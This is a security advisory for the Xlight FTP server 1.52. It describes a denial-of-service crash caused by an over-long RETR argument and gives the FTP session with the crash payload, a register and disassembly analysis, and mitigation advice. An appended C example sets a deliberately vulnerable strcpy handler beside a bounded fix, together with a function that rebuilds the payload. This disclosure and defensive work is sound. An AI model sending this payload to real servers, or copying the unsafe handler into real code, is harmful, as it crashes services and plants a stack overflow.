Application: Xlight ftp server
             http://www.xlightftpd.com/
Version:     1.52
Bug:         Denial of Service
Author:      intuit
e-mail:      intuit@linuxmail.org
web:         http://rootshells.tk/

***********************************************************************

1. Description
2. The bug
3. The code
4. The fix

***********************************************************************

^^^^^^^^^^^^^^^^
1. Description:
^^^^^^^^^^^^^^^^

Vendor's description:

"Xlight ftp server is a powerful ftp server with very small program size. Using its own unique algorithm, it could handle more users than other windows ftp servers. Besides its high performance, xlight ftp server also has a lot of unique features."

***********************************************************************

^^^^^^^^^^^^^^^^
2. The bug:
^^^^^^^^^^^^^^^^

A RETR command whose parameter is longer than 260 characters crashes the ftp server. The command is only accepted after authentication, so any user with a valid login (the session below uses the account "test") can take the server down:

-----------------------------------------------------------------------
ftp> open
To 192.168.144.56
Connected to 192.168.144.56.
220 Xlight Server 1.52 ready...
User (192.168.144.56:(none)): test
331 Password required for test
Password:
230 Login OK.
ftp> literal pasv
227 Entering passive mode (192,168,144,56,5,8) .
ftp> literal retr ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////qwer
Connection closed by remote host.
-----------------------------------------------------------------------

(The RETR argument is a single string of '/' characters followed by "qwer"; it was line-wrapped in the original transcript.)

The ftp server crashes with an application error in xlight.exe.

***********************************************************************

^^^^^^^^^^^^^^^^
3. The code:
^^^^^^^^^^^^^^^^

The fault occurs here. Windows reports:

"xlight.exe has encountered a problem and needs to close. We are sorry for the inconvenience."
-----------------------------------------------------------------------
AppName: xlight.exe   AppVer: 0.0.0.0
ModName: xlight.exe   ModVer: 0.0.0.0
Offset:  00016549
-----------------------------------------------------------------------

-----------------------------------------------------------------------
Registers:

EAX=2F2F2F2F  EBX=00000000  ECX=00E3F420  EDX=00000000
ESI=000001FA  EDI=00000169  EIP=00416549  ESP=00E3EEC4
EBP=00E3F000  EFL=00000212
CS=001B  DS=0023  ES=0023  SS=0023  FS=0038  GS=0000
OV=0 UP=0 EI=1 PL=0 ZR=0 AC=1 PE=0 CY=0

2F2F2F43 = ????????      (EAX+14h, the address of the faulting read; unmapped)

Code:

004164C8  push  ebp
004164C9  mov   ebp,esp
004164CB  sub   esp,22Ch
004164D1  mov   eax,dword ptr [ebp+8]
004164D4  shl   eax,4
004164D7  mov   ecx,dword ptr ds:[48CACCh]
004164DD  lea   edx,[ecx+eax+3A8h]
004164E4  mov   dword ptr [ebp-8],edx
004164E7  mov   eax,dword ptr [ebp-8]
004164EA  mov   ecx,dword ptr [eax+8]
004164ED  mov   dword ptr [ebp-0Ch],ecx
004164F0  mov   edx,dword ptr [ebp+8]
004164F3  push  edx
004164F4  call  004149B6
004164F9  add   esp,4
004164FC  mov   dword ptr [ebp-14h],eax
004164FF  cmp   dword ptr [ebp-14h],0
00416503  jne   0041650A
00416505  jmp   004166E8
0041650A  mov   eax,dword ptr [ebp+10h]        ; the RETR argument
0041650D  push  eax
0041650E  lea   ecx,[ebp-120h]                 ; fixed-size stack buffer
00416514  push  ecx
00416515  call  0045D7E0                       ; copied into the buffer, no visible length check
0041651A  add   esp,8
0041651D  mov   edx,dword ptr [ebp-14h]
00416520  add   edx,1798h
00416526  mov   dword ptr [ebp-18h],edx
00416529  mov   eax,dword ptr [ebp+14h]
0041652C  add   eax,18h
0041652F  push  eax
00416530  mov   ecx,dword ptr [ebp+14h]
00416533  add   ecx,14h
00416536  push  ecx
00416537  lea   edx,[ebp-120h]
0041653D  push  edx
0041653E  call  00404661
00416543  add   esp,0Ch
00416546  mov   eax,dword ptr [ebp+14h]
00416549  mov   eax,dword ptr [eax+14h]        <<< ftp server crashes here
0041654C  xor   edx,edx
0041654E  mov   ecx,64h
00416553  div   eax,ecx
00416555  mov   dword ptr [ebp-22Ch],edx
0041655B  mov   dword ptr [ebp-1Ch],0
00416562  jmp   0041656D
00416564  mov   edx,dword ptr [ebp-1Ch]
00416567  add   edx,1
0041656A  mov   dword ptr [ebp-1Ch],edx
0041656D  cmp   dword ptr [ebp-1Ch],2
00416571  jge   004166E8

At the faulting instruction EAX holds 2F2F2F2F, which is four '/' bytes, so the pointer that was loaded from [ebp+14h] has been replaced by bytes from the RETR argument and the read from [EAX+14h] (2F2F2F43) hits unmapped memory. That is consistent with the copy of the argument into the stack buffer at [ebp-120h] (call 0045D7E0 above) running past the end of the buffer; the exact stack layout is not established here.
-----------------------------------------------------------------------

Tested on:
  Win XP Build 2600, Service Pack: None
  Win XP Build 2600, Service Pack: SP1

***********************************************************************

^^^^^^^^^^^^^^^^
4. The fix:
^^^^^^^^^^^^^^^^

None exists at the time of writing. Since the command is only reachable after login, limiting which accounts can authenticate (and disabling anonymous access) reduces exposure until the vendor ships a corrected version.

***********************************************************************
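Since no fix is available, the C below is an added illustration of what one would look like; it is not Xlight's code and not a reconstruction of its source. It sets the pattern the crash dump is consistent with (an unbounded copy of the RETR argument into a fixed stack buffer, after which a pointer stored above that buffer is dereferenced; the four '/' bytes in EAX at the faulting load are what such an overrun produces) beside a bounded handler that measures the argument first and answers an over-long path with a 501 reply instead of copying it. The structure layout, the buffer size, the 260-byte limit (Windows MAX_PATH, the advisory's threshold) and all function names are assumptions. The payload builder reproduces the argument from the session above: a run of '/' followed by "qwer".

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define XL_MAX_PATH 260   /* assumed limit: Windows MAX_PATH, the advisory's ">260" threshold */

/* Stand-in for the object whose address sat at [ebp+14h] in the crash dump;
 * `total` plays the field read at [eax+14h] when the server faulted. */
struct xfer { unsigned int pad[5]; unsigned int total; };

/* Vulnerable pattern (assumed, for comparison only; never called here): the
 * argument is copied into a fixed stack buffer with no length check, then a
 * pointer that lives above the buffer on the stack is dereferenced. Fed the
 * output of build_poc_arg() this overruns `path`. */
unsigned int retr_unsafe(const char *arg, struct xfer *xf)
{
    char path[XL_MAX_PATH + 20];   /* roughly the 0x118-byte buffer at [ebp-120h] */
    strcpy(path, arg);             /* unbounded copy */
    return xf->total % 100;        /* the 'div ... 64h' that follows the crashing load */
}

/* Hardened form: the caller passes the measured length, the handler refuses
 * anything that does not fit (terminator included) before touching `path`,
 * and copies exactly that many bytes. Returns the FTP reply code. */
int retr_safe(const char *arg, size_t arglen, char *reply, size_t replysz)
{
    char path[XL_MAX_PATH];
    if (arglen == 0) {
        snprintf(reply, replysz, "501 RETR requires a path\r\n");
        return 501;
    }
    if (arglen >= sizeof path) {
        snprintf(reply, replysz, "501 Path too long (max %u bytes)\r\n",
                 (unsigned)(sizeof path - 1));
        return 501;
    }
    memcpy(path, arg, arglen);
    path[arglen] = '\0';
    snprintf(reply, replysz, "150 Opening data connection for %s\r\n", path);
    return 150;
}

/* Case-insensitive match of the verb at the start of a command line. */
static int verb_is(const char *line, size_t vlen, const char *verb)
{
    size_t i;
    if (vlen != strlen(verb)) return 0;
    for (i = 0; i < vlen; i++)
        if (toupper((unsigned char)line[i]) != verb[i]) return 0;
    return 1;
}

/* Dispatch one control-connection line ("RETR <path>\r\n"): split verb and
 * argument, measure the argument up to the line ending (never truncate it,
 * or an over-long path would be silently accepted), route RETR through the
 * bounded handler. Returns the reply code written into `reply`. */
int handle_line(const char *line, char *reply, size_t replysz)
{
    size_t vlen = strcspn(line, " \r\n");
    const char *arg = line + vlen;
    while (*arg == ' ') arg++;
    if (verb_is(line, vlen, "RETR"))
        return retr_safe(arg, strcspn(arg, "\r\n"), reply, replysz);
    snprintf(reply, replysz, "502 Command not implemented\r\n");
    return 502;
}

/* Build the argument from the advisory's session: `slashes` copies of '/'
 * followed by "qwer". Returns the length written, or 0 if `cap` is too small. */
size_t build_poc_arg(char *out, size_t cap, size_t slashes)
{
    const char tail[] = "qwer";
    size_t n = slashes + sizeof tail - 1;
    if (n + 1 > cap) return 0;
    memset(out, '/', slashes);
    memcpy(out + slashes, tail, sizeof tail);   /* includes the terminator */
    return n;
}

/* Reply code for a single line (reply text discarded). */
int reply_code_for(const char *line)
{
    char reply[320];
    return handle_line(line, reply, sizeof reply);
}

/* Reply code the bounded handler gives the advisory's payload with `slashes`
 * leading '/' characters; -1 if the payload does not fit the scratch buffer. */
int poc_reply_code(size_t slashes)
{
    char arg[600], line[620];
    if (build_poc_arg(arg, sizeof arg, slashes) == 0) return -1;
    snprintf(line, sizeof line, "RETR %s\r\n", arg);
    return reply_code_for(line);
}

int main(void)
{
    char reply[320];
    char arg[600], line[620];
    build_poc_arg(arg, sizeof arg, 261);          /* 265 characters, > 260 as in the session */
    snprintf(line, sizeof line, "RETR %s\r\n", arg);
    handle_line(line, reply, sizeof reply);
    printf("over-long RETR -> %s", reply);
    handle_line("RETR pub/readme.txt\r\n", reply, sizeof reply);
    printf("normal RETR    -> %s", reply);
    return 0;
}
```

The check is on the real length of the argument as received, not on a truncated copy, which is the mistake that turns "reject" into "accept the first 259 bytes". Anything of 260 bytes or more is refused because the buffer must also hold the terminator.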